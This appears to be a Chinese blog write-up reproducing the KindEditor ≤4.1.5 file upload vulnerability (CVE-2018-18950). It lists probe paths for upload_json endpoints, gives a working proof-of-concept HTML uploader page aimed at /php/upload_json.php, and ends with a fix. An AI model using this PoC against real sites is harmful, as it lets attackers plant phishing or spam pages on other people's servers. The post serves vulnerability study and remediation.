KindEditor文件上传漏洞(CVE-2018-18950)

本文描述了KindEditor4.1.5编辑器中的文件上传漏洞,攻击者可以通过恶意HTML文件上传.txt和.html文件,进行钓鱼攻击。复现步骤包括查看版本、构造POC和使用CURL。修复建议是删除upload_json.和file_manager_json.文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞描述:

漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。 /php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。

复现过程:

1.访问ip;port

2.查看版本信息

/kindeditor.js

小于kindeditor4.1.5 ,证明存在文件上传漏洞

3.访问文件上传页面

4.进行尝试如下路径是否存在有必要验证文件 upload_json.*,常见判断路径如下:

​/asp/upload_json.asp?dir=file

​/asp.net/upload_json.ashx?dir=file

​/jsp/upload_json.jsp?dir=file

​/php/upload_json.php?dir=file

证明系统的语言为php

5.构造POC或者CURL提交文件。这次采用构造 POC,url替换为攻击url。

<html><head>

    <title>Uploader</title>

    <script src="http://ip:port/kindeditor.js"></script>

    <script>        KindEditor.ready(function (K) {            var uploadbutton = K.uploadbutton({                button: K('#uploadButton')[0],                fieldName: 'imgFile',                url: 'http://ip:port/php/upload_json.php?dir=file',                afterUpload: function (data) {                    if (data.error === 0) {                        var url = K.formatUrl(data.url, 'absolute');                        K('#url').val(url);                    }                },            });            uploadbutton.fileBox.change(function (e) {                uploadbutton.submit();            });        });    </script></head><body>

<div class="upload">

    <input class="ke-input-text" type="text" id="url" value="" readonly=“readonly”/>

    <input type="button" id="uploadButton" value="Upload"/>

</div>

</body>

</html>

​​​​​​​6.访问html文件如下

7.抓包,上传txt文件,获取返回路径

8.访问上传文件,发现成功上传

9.同时也可以上传.html文件

这就是攻击者最喜欢上传的文件(里面包含了各种暗页连接地址,如菠菜和其他色情站点链接地址)

修复建议:

1.直接删除upload_json.和file_manager_json.即可

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值